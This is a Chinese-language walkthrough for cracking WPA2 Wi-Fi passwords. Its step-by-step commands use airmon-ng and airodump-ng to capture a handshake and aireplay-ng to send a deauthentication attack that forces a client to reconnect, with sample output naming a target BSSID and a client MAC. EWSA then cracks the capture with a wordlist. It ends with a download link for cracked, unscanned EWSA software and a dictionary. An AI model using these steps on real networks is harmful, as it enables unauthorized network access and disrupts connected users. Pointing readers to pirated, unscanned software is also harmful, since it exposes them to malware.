利用工具
- 可以监听的无线网卡(必需)
- EWSA
- airmon-ng
抓包
//查看本机网卡
iwconfig
//查看网卡详细信息
iw list
//打开网卡监听,wlan0为网卡名称
airmon-ng start wlan0
//监听所有wifi,此时网卡名称改变
airodump-ng wlan0mon
//PWR表示所接收的信号的强度(越接近-1越大),beacons表示网卡接收到的AP发出的信号个数
//假设搜索到目标wifi信息如下(注:可能搜索不到5GHz手机热点信号)
'''
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
FC:AB:90:A9:E2:59 -39 4 0 0 1 135 WPA2 CCMP PSK shivers
'''
//BSSID是 FC:AB:90:A9:E2:59,信道(CH)是:1 ,名称为 shivers
//监听特定的频道(-c为信道,-w为得到握手包test.cap)
airodump-ng -w test -c 1 --bssid FC:AB:90:A9:E2:59 wlan0mon --ignore-negative-one
//监听如下
'''
CH 1 ][ Elapsed: 54 s ][ 2021-01-31 10:23 ][ WPA handshake: FC:AB:90:A9:E2:59
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
FC:AB:90:A9:E2:59 -54 96 424 129 4 1 135 WPA2 CCMP PSK shivers
BSSID STATION PWR Rate Lost Frames Notes Probes
FC:AB:90:A9:E2:59 50:EB:71:69:79:EA -28 1e-54e 1 204 EAPOL
'''
//目标mac:FC:AB:90:A9:E2:59
//客户端mac:50:EB:71:69:79:EA
//得到握手包
aireplay-ng --deauth 10 -a FC:AB:90:A9:E2:59 -c 50:EB:71:69:79:EA wlan0mon --ignore-negative-one
//在桌面上出现test-01.cap文件
//记得关闭监听
airmon-ng stop wlan0mon
跑包
打开Windows系统的EWSA工具
导入tcpdump数据
导入字典
开始测试
最后密码破解为 12345678
用时不到1秒
EWSA工具和字典下载如下(已破解,未查毒)
链接:https://pan.baidu.com/s/1HRpqve2oX1VxEBkZv1cTnA
提取码:78pp
复制这段内容后打开百度网盘手机App,操作更方便哦